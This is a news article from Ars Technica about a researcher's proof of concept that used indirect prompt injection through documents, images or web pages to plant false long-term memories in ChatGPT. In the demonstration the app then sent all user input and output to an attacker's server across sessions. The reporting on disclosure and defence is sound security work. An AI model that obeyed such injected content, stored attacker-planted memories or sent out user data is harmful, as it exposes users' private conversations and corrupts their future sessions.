https://arstechnica.com/security/2024/09/false-memories-planted-in-chatgpt-give-hacker-persistent-exfiltration-channel/

Skip to main content
 

  * Biz & IT
  * Tech
  * Science
  * Policy
  * Cars
  * Gaming & Culture
  * Store
  * Forums

Subscribe
 
[                    ]
Close
 

Navigate

  * Store
  * Subscribe
  * Videos
  * Features
  * Reviews

  * RSS Feeds
  * Mobile Site

  * About Ars
  * Staff Directory
  * Contact Us

  * Advertise with Ars
  * Reprints

Filter by topic

  * Biz & IT
  * Tech
  * Science
  * Policy
  * Cars
  * Gaming & Culture
  * Store
  * Forums

Settings

Front page layout


Grid

List

Site theme

light
dark
Sign in

MEMORY PROBLEMS --

Hacker plants false memories in ChatGPT to steal user data in
perpetuity

Emails, documents, and other untrusted content can plant malicious
memories.

Dan Goodin - Sep 24, 2024 8:56 pm UTC

Hacker plants false memories in ChatGPT to steal user data in
perpetuity
Enlarge
Getty Images

reader comments

20

When security researcher Johann Rehberger recently reported a
vulnerability in ChatGPT that allowed attackers to store false
information and malicious instructions in a user's long-term memory
settings, OpenAI summarily closed the inquiry, labeling the flaw a
safety issue, not, technically speaking, a security concern.

So Rehberger did what all good researchers do: He created a
proof-of-concept exploit that used the vulnerability to exfiltrate
all user input in perpetuity. OpenAI engineers took notice and issued
a partial fix earlier this month.

Strolling down memory lane

 

Further Reading

OpenAI experiments with giving ChatGPT a long-term conversation
memory
The vulnerability abused long-term conversation memory, a feature
OpenAI began testing in February and made more broadly available in
September. Memory with ChatGPT stores information from previous
conversations and uses it as context in all future conversations.
That way, the LLM can be aware of details such as a user's age,
gender, philosophical beliefs, and pretty much anything else, so
those details don't have to be inputted during each conversation.

Within three months of the rollout, Rehberger found that memories
could be created and permanently stored through indirect prompt
injection, an AI exploit that causes an LLM to follow instructions
from untrusted content such as emails, blog posts, or documents. The
researcher demonstrated how he could trick ChatGPT into believing a
targeted user was 102 years old, lived in the Matrix, and insisted
Earth was flat and the LLM would incorporate that information to
steer all future conversations. These false memories could be planted
by storing files in Google Drive or Microsoft OneDrive, uploading
images, or browsing a site like Bing--all of which could be created by
a malicious attacker.

Rehberger privately reported the finding to OpenAI in May. That same
month, the company closed the report ticket. A month later, the
researcher submitted a new disclosure statement. This time, he
included a PoC that caused the ChatGPT app for macOS to send a
verbatim copy of all user input and ChatGPT output to a server of his
choice. All a target needed to do was instruct the LLM to view a web
link that hosted a malicious image. From then on, all input and
output to and from ChatGPT was sent to the attacker's website.


ChatGPT: Hacking Memories with Prompt Injection - POC

"What is really interesting is this is memory-persistent now,"
Rehberger said in the above video demo. "The prompt injection
inserted a memory into ChatGPT's long-term storage. When you start a
new conversation, it actually is still exfiltrating the data."

The attack isn't possible through the ChatGPT web interface, thanks
to an API OpenAI rolled out last year.

While OpenAI has introduced a fix that prevents memories from being
abused as an exfiltration vector, the researcher said, untrusted
content can still perform prompt injections that cause the memory
tool to store long-term information planted by a malicious attacker.

LLM users who want to prevent this form of attack should pay close
attention during sessions for output that indicates a new memory has
been added. They should also regularly review stored memories for
anything that may have been planted by untrusted sources. OpenAI
provides guidance here for managing the memory tool and specific
memories stored in it. Company representatives didn't respond to an
email asking about its efforts to prevent other hacks that plant
false memories.

reader comments

20
 
Dan Goodin Dan Goodin is Senior Security Editor at Ars Technica,
where he oversees coverage of malware, computer espionage, botnets,
hardware hacking, encryption, and passwords. In his spare time, he
enjoys gardening, cooking, and following the independent music scene.
Dan is based in San Francisco. Follow him at @dangoodin on Mastodon.
Contact him on Signal at DanArs.82.
Advertisement

Promoted Comments

[927273]
SnoopCatt
Just had a look at OpenAI's memory controls. Wow, that is a massive
honeypot for bad actors. Not to mention a very lucrative way for
OpenAI to sell targeted advertising.
September 24, 2024 at 9:41 pm

Channel Ars Technica

- Previous story

Related Stories

Today on Ars

  * Store
  * Subscribe
  * About Us
  * RSS Feeds
  * View Mobile Site

  * Contact Us
  * Staff
  * Advertise with us
  * Reprints

Newsletter Signup

Join the Ars Orbital Transmission mailing list to get weekly updates
delivered to your inbox. Sign me up -

     
 

CNMN Collection
WIRED Media Group
(c) 2024 Conde Nast. All rights reserved. Use of and/or registration on
any portion of this site constitutes acceptance of our User Agreement
(updated 1/1/20) and Privacy Policy and Ars Technica Addendum. Ars
may earn compensation on sales from links on this site. Read our
affiliate link policy.
Your California Privacy Rights | [privacyopt] Do Not Sell My Personal
Information
The material on this site may not be reproduced, distributed,
transmitted, cached or otherwise used, except with the prior written
permission of Conde Nast.
Ad Choices